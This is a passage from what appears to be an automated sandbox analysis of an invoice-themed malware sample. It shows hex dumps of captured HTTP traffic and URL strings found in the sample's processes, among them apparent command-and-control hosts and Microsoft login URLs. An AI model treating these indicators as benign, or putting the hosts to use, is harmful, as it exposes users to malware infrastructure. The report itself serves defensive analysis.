69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:11 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 61 6c 71 75 69 6c 65 72 2e 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 24 52 45 47 49 53 54 52 41 4e 54 31 20 24 52 45 47 49 53 54 52 41 4e 54 32 20 24 52 45 47 49 53 54 52 41 4e 54 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 73 79 73 2e 65 73 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 65 67 75 69 6d 69 65 6e 74 6f 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 45 73 74 61 20 65 73 20 6c 61 20 70 26 61 61 63 75 74 65 3b 67 69 6e 61 20 64 65 3a 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 63 6f 6c 63 68 6f 6e 64 65 6
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:31 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:34 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:37 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 17 Apr 2024 06:40:41 GMTServer: ApacheContent-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.skibinscy-finanse.pl
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2892203666.0000000004B0E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.skibinscy-finanse.pl/aleu/
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://arsys.es/css/parking2.css
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/default.css
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/footer.html
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/header.html
            Source: firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/icon.png
            Source: firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://assets.iv.lt/images/thumbnail.png
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: replace.exe, 00000005.00000002.2891299160.000000000469C000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.000000000308C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cgqbbu1mvnevcxzh.app
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://klientams.iv.lt/
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000005.00000002.2889773857.0000000003092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000005.00000002.2889773857.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: replace.exe, 00000005.00000002.2889773857.0000000003092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: replace.exe, 00000005.00000003.2088352031.0000000007EAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backup
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correo
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendas
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/buscar?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominio
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resell
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=ssl
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/dominios?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=dominios
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seo
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/herramientas/sms?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sms
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/revendedores?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=re
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting/wordpress?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=wordp
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hosting
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partners
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/cloud?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=cloud
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/dedicados?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=de
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/servidores/vps?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=vps
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es/soluciones?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=solutions
            Source: replace.exe, 00000005.00000002.2891299160.000000000450A000.00000004.10000000.00040000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002EFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.arsys.es?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=arsys
            Source: HYCO_Invoices MS2 & MS3.exeString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: replace.exe, 00000005.00000003.2093471603.0000000007EC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/domenai/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/duomenu-centras/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/el-pasto-filtras/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/neribotas-svetainiu-talpinimas/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/profesionalus-hostingas/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/sertifikatai/
            Source: replace.exe, 00000005.00000002.2891299160.0000000004054000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000005.00000002.2892941686.0000000006440000.00000004.00000800.00020000.00000000.sdmp, JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890729672.0000000002A44000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2208939034.0000000028154000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.iv.lt/svetainiu-kurimo-irankis/
